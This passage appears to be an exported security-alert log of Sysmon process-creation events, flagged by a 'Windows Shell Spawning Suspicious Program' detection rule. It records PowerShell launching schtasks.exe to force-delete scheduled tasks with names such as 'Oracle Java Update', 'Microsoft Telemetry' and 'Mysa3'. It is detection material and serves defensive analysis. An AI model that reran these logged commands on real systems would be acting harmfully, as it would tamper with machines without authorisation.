Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:04.946",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:36.401 +ProcessGuid: {df9fc3d3-b360-5ecf-0000-00100fc01900} +ProcessId: 6832 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""Spooler SubSystem Service"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Spooler SubSystem Service\"" /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:36.404525700Z"",""eventRecordID"":""2212"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:36.401\r\nProcessGuid: {df9fc3d3-b360-5ecf-0000-00100fc01900}\r\nProcessId: 6832\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Spooler SubSystem Service\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:36.401"",""processGuid"":""{df9fc3d3-b360-5ecf-0000-00100fc01900}"",""processId"":""6832"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""Spooler SubSystem Service\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:04.931",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:36.360 +ProcessGuid: {df9fc3d3-b360-5ecf-0000-001063be1900} +ProcessId: 2596 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""Microsoft Telemetry"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Microsoft Telemetry\"" /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:36.365128200Z"",""eventRecordID"":""2211"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:36.360\r\nProcessGuid: {df9fc3d3-b360-5ecf-0000-001063be1900}\r\nProcessId: 2596\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Microsoft Telemetry\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:36.360"",""processGuid"":""{df9fc3d3-b360-5ecf-0000-001063be1900}"",""processId"":""2596"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""Microsoft Telemetry\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:04.915",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:36.319 +ProcessGuid: {df9fc3d3-b360-5ecf-0000-0010d2bc1900} +ProcessId: 6372 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""Oracle Java Update"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Oracle Java Update\"" /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:36.321898200Z"",""eventRecordID"":""2210"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:36.319\r\nProcessGuid: {df9fc3d3-b360-5ecf-0000-0010d2bc1900}\r\nProcessId: 6372\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Oracle Java Update\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:36.319"",""processGuid"":""{df9fc3d3-b360-5ecf-0000-0010d2bc1900}"",""processId"":""6372"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""Oracle Java Update\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:04.900",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:36.287 +ProcessGuid: {df9fc3d3-b360-5ecf-0000-001005bb1900} +ProcessId: 1548 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""Oracle Java"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Oracle Java\"" /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:36.299848700Z"",""eventRecordID"":""2209"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:36.287\r\nProcessGuid: {df9fc3d3-b360-5ecf-0000-001005bb1900}\r\nProcessId: 1548\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Oracle Java\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:36.287"",""processGuid"":""{df9fc3d3-b360-5ecf-0000-001005bb1900}"",""processId"":""1548"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""Oracle Java\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:04.884",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:36.249 +ProcessGuid: {df9fc3d3-b360-5ecf-0000-001075b91900} +ProcessId: 664 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ok /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN ok /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:36.251984400Z"",""eventRecordID"":""2208"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:36.249\r\nProcessGuid: {df9fc3d3-b360-5ecf-0000-001075b91900}\r\nProcessId: 664\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN ok /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:36.249"",""processGuid"":""{df9fc3d3-b360-5ecf-0000-001075b91900}"",""processId"":""664"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN ok /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:04.868",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:36.223 +ProcessGuid: {df9fc3d3-b360-5ecf-0000-0010e5b71900} +ProcessId: 6880 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Mysa3 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa3 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:36.226192100Z"",""eventRecordID"":""2207"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:36.223\r\nProcessGuid: {df9fc3d3-b360-5ecf-0000-0010e5b71900}\r\nProcessId: 6880\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa3 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:36.223"",""processGuid"":""{df9fc3d3-b360-5ecf-0000-0010e5b71900}"",""processId"":""6880"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Mysa3 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 